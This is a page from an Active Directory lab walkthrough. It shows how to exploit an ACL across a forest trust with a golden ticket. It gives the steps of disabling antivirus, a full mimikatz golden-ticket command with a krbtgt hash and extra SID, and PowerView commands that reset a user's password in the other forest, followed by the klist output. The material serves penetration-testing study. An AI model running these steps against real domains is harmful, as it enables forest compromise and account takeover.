Exploit acl with external trust golden ticket

  • Ok now imagine we want to exploit this acl from Maryland:

By now i didn’t found a nice way to do this from linux, but from windows it is pretty easy

  • Connect as administrator on baltimore, disable the antivrius to be able to use mimikatz and powerview

  • Create the golden ticket with mimikatz matching the group CentralPark(RID 1130)

mimikatz # kerberos::golden /user:guard /domain:maryland.local /sid:S-1-5-21-2203133648-1386395927-1390703624 /krbtgt:e58cf01ba6cc645da9f7ab1f28fc3934 /sids:S-1-5-21-1409754491-4246775990-3914137275-1130 /ptt

  • And now use powerview to change diego.Montenegro password

Import-Module .\powerview.ps1
$SecPassword = ConvertTo-SecureString 'letsdothis' -AsPlainText -Force
Set-DomainUserPassword -Identity diego.Montenegro -AccountPassword $SecPassword -Domain newyork.local

  • And it work !

  • And if we look at the created tickets with klist:

    • Server: krbtgt/maryland.local @ maryland.local (golden ticket)

    • Server: krbtgt/NEWYORK.LOCAL @ MARYLAND.LOCAL (kdc: baltimore) (tgt inter realm)

    • Server: ldap/nyc.newyork.local @ NEWYORK.LOCAL (kdc: NYC)

    • Server: ldap/nyc.newyork.local/newyork.local @ NEWYORK.LOCAL (kdc: nyc)

PreviousTrust ticket with external forest ( maryland.local-> newyork.local)NextExploiting IIS & Privilege escalation

Last updated